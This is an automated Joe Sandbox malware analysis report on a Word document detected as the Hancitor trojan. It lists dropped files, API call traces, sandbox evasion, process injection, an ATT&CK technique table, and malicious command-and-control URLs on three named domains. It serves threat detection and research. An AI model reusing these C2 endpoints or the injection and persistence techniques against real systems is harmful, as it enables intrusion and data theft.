ddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,Add
FontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontR5_2_02861584
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)Jump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02834260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,5_2_02834260
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02816044 IsIconic,SetRect,GetWindowLongA,GetWindowLongA,AdjustWindowRectEx,SetRect,5_2_02816044
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02818E08 IsIconic,5_2_02818E08
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02818FC0 IsIconic,SetWindowPos,PostMessageA,5_2_02818FC0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281EF78 SendMessageA,SetClassLongA,IsIconic,InvalidateRect,5_2_0281EF78
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02818CFC IsIconic,BeginPaint,DrawIcon,EndPaint,5_2_02818CFC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027F4DD4 IsIconic,GetWindowPlacement,GetWindowRect,5_2_027F4DD4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281B2E0 IsIconic,SetWindowPos,PostMessageA,5_2_0281B2E0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028330B4 IsIconic,GetCapture,5_2_028330B4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281D794 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,5_2_0281D794
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028194AC IsIconic,IsZoomed,ShowWindow,5_2_028194AC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02819BD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,5_2_02819BD8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02833968 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,5_2_02833968
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02815EA0 SendMessageA,IsIconic,5_2_02815EA0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DFFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_0281DFFC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DF10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_0281DF10
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02838884 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,5_2_02838884
              Source: 0524_4109399728218.docStream path 'Data' entropy: 7.97217114132 (max. 8.0)
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280F83C5_2_0280F83C
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep count: 261 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep time: -15660000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep count: 268 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep time: -16080000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-49544
              Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.8 %
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,5_2_0281CA50
              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-49634
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1870913373.0000000002933000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@R
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027F8DCC GetSystemInfo,5_2_027F8DCC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D8948 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,5_2_027D8948
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D55A4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_027D55A4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02861584 GetEnhMetaFileW,GetEnhMetaFileW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadLibraryA,GetProcAddress,VirtualAllocEx,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,DeleteObject,DeleteObject,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,Add
FontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontR5_2_02861584
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D1390 GetProcessHeap,RtlAllocateHeap,5_2_042D1390
              Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: thowerteigime.com
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: euvereginumet.ru
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: rhopulforopme.ru
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 64.185.227.155 80Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D3880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,5_2_042D3880
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_027D575C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027D6070
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027D606E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,5_2_027DCA44
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027DB454
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027DB408
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_027D5868
              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D9ED4 GetLocalTime,5_2_027D9ED4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02838ED0 GetVersion,5_2_02838ED0

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara matchFile source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts22
              Scripting
              Path Interception21
              Process Injection
              1
              Disable or Modify Tools
              21
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium2
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts2
              Native API
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol1
              Screen Capture
              Exfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts23
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)22
              Scripting
              Security Account Manager26
              System Information Discovery
              SMB/Windows Admin Shares21
              Input Capture
              Automated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
              Obfuscated Files or Information
              NTDS231
              Security Software Discovery
              Distributed Component Object Model12
              Clipboard Data
              Scheduled Transfer112
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets11
              Virtualization/Sandbox Evasion
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common11
              Masquerading
              Cached Domain Credentials11
              Application Window Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items11
              Virtualization/Sandbox Evasion
              DCSync1
              Remote System Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
              Process Injection
              Proc Filesystem1
              System Network Configuration Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
              Rundll32
              /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Source | Detection | Scanner | Label
              0524_4109399728218.doc | 66% | Virustotal |
              0524_4109399728218.doc | 66% | ReversingLabs | Document-Word.Trojan.Hancitor
              0524_4109399728218.doc | 100% | Avira | HEUR/AGEN.1328612
              0524_4109399728218.doc | 100% | Joe Sandbox ML |

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp | 100% | Avira | HEUR/AGEN.1328612
              C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.k | 77% | ReversingLabs | Win32.Trojan.Hancitor
              c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy) | 77% | ReversingLabs | Win32.Trojan.Hancitor

              Source | Detection | Scanner | Label
              5.2.rundll32.exe.42d0000.3.unpack | 100% | Avira | TR/Hijacker.Gen
              5.2.rundll32.exe.27d0000.0.unpack | 100% | Avira | HEUR/AGEN.1323277
              5.2.rundll32.exe.28d0174.1.unpack | 100% | Avira | TR/Kazy.4159236

              Source | Detection | Scanner | Label
              thowerteigime.com | 16% | Virustotal |
              euvereginumet.ru | 10% | Virustotal |
              rhopulforopme.ru | 13% | Virustotal |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              api4.ipify.org | 64.185.227.155 | true | false | | high
              thowerteigime.com | unknown | unknown | true | | unknown
              euvereginumet.ru | unknown | unknown | true | | unknown
              api.ipify.org | unknown | unknown | false | | high
              rhopulforopme.ru | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://thowerteigime.com/8/forum.php | true | Avira URL Cloud: malware | unknown
              http://euvereginumet.ru/8/forum.php | true | Avira URL Cloud: malware | unknown
              http://api.ipify.org/ | false | | high
              http://rhopulforopme.ru/8/forum.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
64.185.227.155 | api4.ipify.org | United States | - | 18450 | WEBNXUS | false

IP
192.168.2.1

                        Joe Sandbox Version:37.0.0 Beryl
                        Analysis ID:854354
                        Start date and time:2023-04-26 12:37:30 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:1
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample file name:0524_4109399728218.doc
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winDOC@7/60@814/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 49.5% (good quality ratio 48.6%)
                        • Quality average: 84.9%
                        • Quality standard deviation: 23.2%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 36
                        • Number of non-executed functions: 161
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Exclude process from analysis (whitelisted): WMIADAP.exe, svchost.exe, WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.73.26, 2.19.229.151, 20.254.138.227, 20.254.144.98, 51.140.219.248, 20.58.112.2, 95.101.111.179, 95.101.111.168, 2.16.241.16, 2.16.241.4
                        • Excluded domains from analysis (whitelisted): self-events-data.trafficmanager.net, fs.microsoft.com, binaries.templates.cdn.office.net.edgesuite.net, self.events.data.microsoft.com, prod-eu.naturallanguageeditorservice.osi.office.net.akadns.net, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e26769.b.akamaiedge.net, a1847.dscg2.akamai.net, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, login.live.com, e16604.g.akamaiedge.net, onedscolprdeus09.eastus.cloudapp.azure.com, metadata.templates.cdn.office.net, prod.fs.microsoft.com.akadns.net, binaries.templates.cdn.office.net
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
12:39:00 | API Interceptor | 21x Sleep call for process: splwow64.exe modified
12:39:09 | API Interceptor | 540x Sleep call for process: rundll32.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        64.185.227.155CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                        • api.ipify.org/
                        aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • api.ipify.org/
                        M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • api.ipify.org/
                        WolcGwXQ5c.exeGet hashmaliciousFicker Stealer, RHADAMANTHYS, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • api.ipify.org/
                        xc17rfFdOM.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        8Ghi4RAfH5.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        file.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        48PTRR4pVY.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=qwd
                        No context
                        No context
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):379722
                        Entropy (8bit):4.9088149211082355
                        Encrypted:false
                        SSDEEP:1536:MApDpphudnceJZezca9uRszBEmj6QkjfoJ5Jj7DMnDAYRbLSm5rYOLdHKmC9:lDThumeGzcTRszB7DkjfaJj76RbNbLW9
                        MD5:E9FB5A0DF105C6F7F80E8B650DF56AAB
                        SHA1:0B7F6ADA05673F2535E61267C3CB428489ECEB55
                        SHA-256:A24470762A1F9F5F069C0F70EF53D693D08B7C99797935800FF294BD3B2566F3
                        SHA-512:65C83135CE550981ED88CB4A83127CB3C94D5C616F26B05185FCC129E5201A88EB0A1351D144E1511B50ADB388071BFCC60388FDD613EBBA5B202FFC76F7D42B
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:{"MajorVersion":4,"MinorVersion":17,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"31150835240","p":[2,11,8,4,2,2,2,2,2,4],"sub":[],"t":"ttf","u":[3,0,0,0],"v":67502,"w":45875968},{"c":[536870913,0],"dn":"Agency FB","fs":52680,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"29260917085","p":[2,11,5,3,2,2,2,2,
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_17RegularVersion 4.17;O365
                        Category:dropped
                        Size (bytes):672416
                        Entropy (8bit):6.566110770587873
                        Encrypted:false
                        SSDEEP:12288:/3zUbLds556T1BEFGHtASk3+/KLQ/zp1km/WJ1ov0mPqxXE/RoVZPE9Ob:/Qfds5opwSL1kovT92
                        MD5:4DFB7AADD4771ADDF1BA168C12DEDBF3
                        SHA1:B379DC0E19FE0F51E77305BE0A7F3421B80E8A0F
                        SHA-256:DB9B46CC2132D76EF90CA9A59AF03CB478BB91EA2CDA3E8E42DD0801873416E2
